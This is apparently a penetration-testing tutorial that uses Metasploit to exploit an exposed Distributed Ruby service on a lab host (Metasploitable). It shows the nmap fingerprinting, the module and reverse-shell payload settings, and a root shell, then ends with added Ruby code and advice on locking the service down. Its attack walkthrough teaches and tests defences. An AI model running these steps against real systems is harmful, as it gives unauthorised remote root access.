Remote Code Execution Against Distributed Ruby with Metasploit
Developers and users fall into the same convenient habits every day, and those habits are usually the easiest entry point an attacker can find.
Every product we build trades convenience against security somewhere.
Distributed Ruby deployments show exactly that trade-off, which is why Metasploit can test one with so little effort.
What is Distributed Ruby?
What is distributed computing? When one computer is not powerful enough and a supercomputer is out of reach, the work and data are spread across many machines so that together they approach a supercomputer's capacity.
Distributed Ruby (dRuby, DRb) is Ruby's distributed object system: it lets one Ruby process call methods on an object that lives in another process. A server publishes a "front" object on a druby:// URI, and clients receive a proxy that forwards method calls to it.
That flexibility is useful for extending programs with remote services, but the security consequence is direct: whatever object the server exposes, every public method it inherits from Object is reachable by any client that can connect, instance_eval included. A DRb port exposed on the network without access control therefore amounts to handing out code execution as the user running the service, which is what the Metasploit module used below demonstrates (its targets are named Trap, Eval and Syscall after the three methods it calls on the exposed object).
0x01 Test Environment
Attacker and target were both set up from Parrot Security OS for this demo (the attacker is 172.16.1.100, used as LHOST later).
Target IP: 172.16.1.102
Ruby version: ruby 2.0.0p648 (2015-12-16) [x86_64-linux]
Note that the scan and shell output captured below do not match this description of the target: nmap fingerprints the DRb service on 172.16.1.102 as Ruby 1.8 and uname reports an i686 kernel on a host named metasploitable, so the Ruby version listed here is not the one the vulnerable service is actually running.
0x02 Confirming the Service
Run dRuby on the target. When a dRuby server starts it binds itself to a specific URI and port; for this demo that port is 8787, so nmap can find it.
nmap -sV <ip> -p 8787 probes only port 8787 on the target and asks nmap to identify the software and version behind it:
nmap -sV 172.16.1.102 -p 8787
[*] exec: nmap -sV 172.16.1.102 -p 8787
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-25 18:16 CST
Nmap scan report for 172.16.1.102
Host is up (0.0013s latency).
PORT STATE SERVICE VERSION
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
MAC Address: 08:00:27:77:62:6C (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.65 seconds
The dRuby service is present and running, so it is time to bring out Metasploit.
0x03 Exploitation
Launch Metasploit with msfconsole and run search drb to list the matching modules:
msf > search drb
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
exploit/linux/misc/drb_remote_codeexec 2011-03-23 excellent No Distributed Ruby Remote Code Execution
exploit/multi/misc/wireshark_lwres_getaddrbyname 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
exploit/multi/misc/wireshark_lwres_getaddrbyname_loop 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
drb_remote_codeexec is the module we want (the two Wireshark hits only match because the letters drb occur inside getaddrbyname). Load it with use followed by the module path, then info to read its details:
msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(linux/misc/drb_remote_codeexec) > info
Name: Distributed Ruby Remote Code Execution
Module: exploit/linux/misc/drb_remote_codeexec
Platform: Unix
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2011-03-23
Provided by:
joernchen <[email protected]>
Available targets:
Id Name
-- ----
0 Automatic
1 Trap
2 Eval
3 Syscall
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST no The target address
RPORT 8787 yes The target port
URI no The URI of the target host (druby://host:port) (overrides RHOST/RPORT)
Payload information:
Space: 32768
Description:
This module exploits remote code execution vulnerabilities in dRuby.
References:
CVE: Not available
http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html
http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/
http://bugkraut.de/posts/tainting
0x04 Launching the Exploit
Set the target address. RPORT already defaults to 8787, so only RHOST is needed; then list the payloads the module can deliver:
msf exploit(linux/misc/drb_remote_codeexec) > set rhost 172.16.1.102
rhost => 172.16.1.102
msf exploit(linux/misc/drb_remote_codeexec) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs)
cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub)
cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
cmd/unix/generic normal No Unix Command, Generic Command Execution
cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)
cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs)
cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub)
cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
generic/custom normal No Custom Payload
generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
We pick cmd/unix/reverse_ruby: the target necessarily has a Ruby interpreter, because that is what serves DRb, so this payload is guaranteed to run. The module's Arch is cmd, which is why every payload listed is a command string rather than a binary stager.
msf exploit(linux/misc/drb_remote_codeexec) > set payload cmd/unix/reverse_ruby
payload => cmd/unix/reverse_ruby
msf exploit(linux/misc/drb_remote_codeexec) > options
Module options (exploit/linux/misc/drb_remote_codeexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.1.102 no The target address
RPORT 8787 yes The target port
URI no The URI of the target host (druby://host:port) (overrides RHOST/RPORT)
Payload options (cmd/unix/reverse_ruby):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Set the listener address on the attacker side (LPORT stays at the default 4444):
msf exploit(linux/misc/drb_remote_codeexec) > set lhost 172.16.1.100
lhost => 172.16.1.100
0x05 Getting a Shell
Then run. With the Automatic target the module tries the instance_eval method first; when the server refuses it, the module falls back to the syscall method, which succeeds here, and the shell that comes back is root because that is the user the DRb service was started as:
msf exploit(linux/misc/drb_remote_codeexec) > run
[*] Started reverse TCP handler on 172.16.1.100:4444
[*] Trying to exploit instance_eval method
[!] Target is not vulnerable to instance_eval method
[*] Trying to exploit syscall method
[*] attempting x86 execve of .JU4AK4Gh3sOBkaB7
[+] Deleted .JU4AK4Gh3sOBkaB7
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
ip address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 08:00:27:77:62:6c brd ff:ff:ff:ff:ff:ff
inet 172.16.1.102/12 brd 172.31.255.255 scope global eth0
inet6 fe80::a00:27ff:fe77:626c/64 scope link
valid_lft forever preferred_lft forever
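The session above shows the root cause rather than a bug in one version: the DRb front object on 172.16.1.102 is reachable by anyone who can open port 8787, and DRb forwards every public method of that object, so Object#instance_eval (the module's Eval target) is as callable as the service's own methods. The Syscall fallback only matters once a server blocks eval, for example by running under $SAFE = 1, where evaluating a tainted string received from the network raises SecurityError (this is what the bugkraut.de tainting reference in the module's info is about); on the Ruby 1.8 DRb fingerprinted here the private Kernel#syscall was still forwarded, which is why the module got its root shell anyway. $SAFE no longer exists in Ruby 3, so the remaining controls are the exposed interface, an access list and the bind address. The Ruby below is an added example, not code from the post or from Metasploit: it models the server-side filter DRb applies before forwarding a call (drb_dispatch is my simplified stand-in, not DRb's own code), drives a front object the way the Eval target does, and then shows the hardened shape with a facade that keeps only the intended method, a real ACL from drb/acl that admits loopback only, and a loopback bind. Calculator, CalculatorFacade, LOOPBACK_ONLY, probe and acl_allows? are assumed names; DRb.start_service, DRb.install_acl and ACL#allow_addr? are the real library API.

```ruby
# Added example, not from the original post or from Metasploit.
# Models why an exposed DRb front object hands out code execution and what a
# hardened server changes. drb ships with Ruby (a bundled gem since 3.4).
require 'drb/drb'
require 'drb/acl'

# A typical service object (assumed class name). The vulnerable deployment is just
#   DRb.start_service('druby://0.0.0.0:8787', Calculator.new)
# with 8787 being the port scanned in the post.
class Calculator
  def add(a, b)
    a + b
  end
end

# Hardened front: same functionality, but the inherited meta-programming entry
# points an attacker reaches for are undefined on this class, so even a client
# that gets through cannot turn the object into eval or send. This is defence
# in depth; the primary control is not being reachable at all (see below).
class CalculatorFacade
  undef_method :instance_eval, :instance_exec, :send, :public_send, :method,
               :instance_variable_set, :instance_variable_get, :extend,
               :define_singleton_method
  def add(a, b)
    a + b
  end
end

# Stand-in for DRb's server-side filter (an assumption modelled on its behaviour,
# not DRb's own code): only __send__ and private/protected methods are refused;
# every other public method the front object has is forwarded unchanged.
INSECURE_METHODS = [:__send__].freeze

def drb_dispatch(front, msg_id, *args)
  raise SecurityError, "insecure method `#{msg_id}'" if INSECURE_METHODS.include?(msg_id)
  if front.private_methods.include?(msg_id) || front.protected_methods.include?(msg_id)
    raise NoMethodError, "private method `#{msg_id}' called for #{front.class}"
  end
  front.__send__(msg_id, *args)
end

# Three calls a client can make once it reaches the port: the legitimate method,
# the string eval the module's "Eval" target uses, and Object#send, which is not on
# the insecure list and bypasses method visibility. Each result is the return value
# or the exception class the filter/front raised.
def probe(front)
  calls = [[:add, 2, 3],
           [:instance_eval, '2 ** 10'],
           [:send, :eval, '6 * 7']]
  calls.each_with_object({}) do |(msg_id, *args), results|
    results[msg_id] = begin
      drb_dispatch(front, msg_id, *args)
    rescue NoMethodError, SecurityError => e
      e.class
    end
  end
end

# Real DRb API: an ACL checked against the peer address of every connection.
# With the default deny/allow order a matching allow wins, then a matching deny.
LOOPBACK_ONLY = ACL.new(%w[deny all allow 127.0.0.1 allow ::1])

# DRb hands the ACL the Socket#peeraddr array: [family, port, hostname, ip].
def acl_allows?(acl, ip)
  acl.allow_addr?(['AF_INET', 0, ip, ip])
end

# Hardened server shape: ACL installed before the service starts, bound to
# loopback (or 'drbunix:///run/calc.sock' after require 'drb/unix'), facade as
# front. Not started here; returns the URI the service listens on.
def start_hardened_service(front = CalculatorFacade.new)
  DRb.install_acl(LOOPBACK_ONLY)
  DRb.start_service('druby://127.0.0.1:8787', front)
  DRb.uri
end

if __FILE__ == $PROGRAM_NAME
  p probe(Calculator.new)        # add => 5, instance_eval => 1024, send => 42
  p probe(CalculatorFacade.new)  # add => 5, instance_eval and send => NoMethodError
  p acl_allows?(LOOPBACK_ONLY, '172.16.1.100')  # false: the attacker's address is refused
end
```

The probe against Calculator is the whole vulnerability in three lines: instance_eval and send sail through the same filter that the legitimate add call does. The facade closes those specific doors, but a server that is reachable from the network still exposes whatever else its front object can do, so the ACL and the loopback bind are the controls to rely on; a DRb endpoint that must be reached across hosts should sit behind drbssl:// with client certificates or an SSH tunnel rather than on 0.0.0.0.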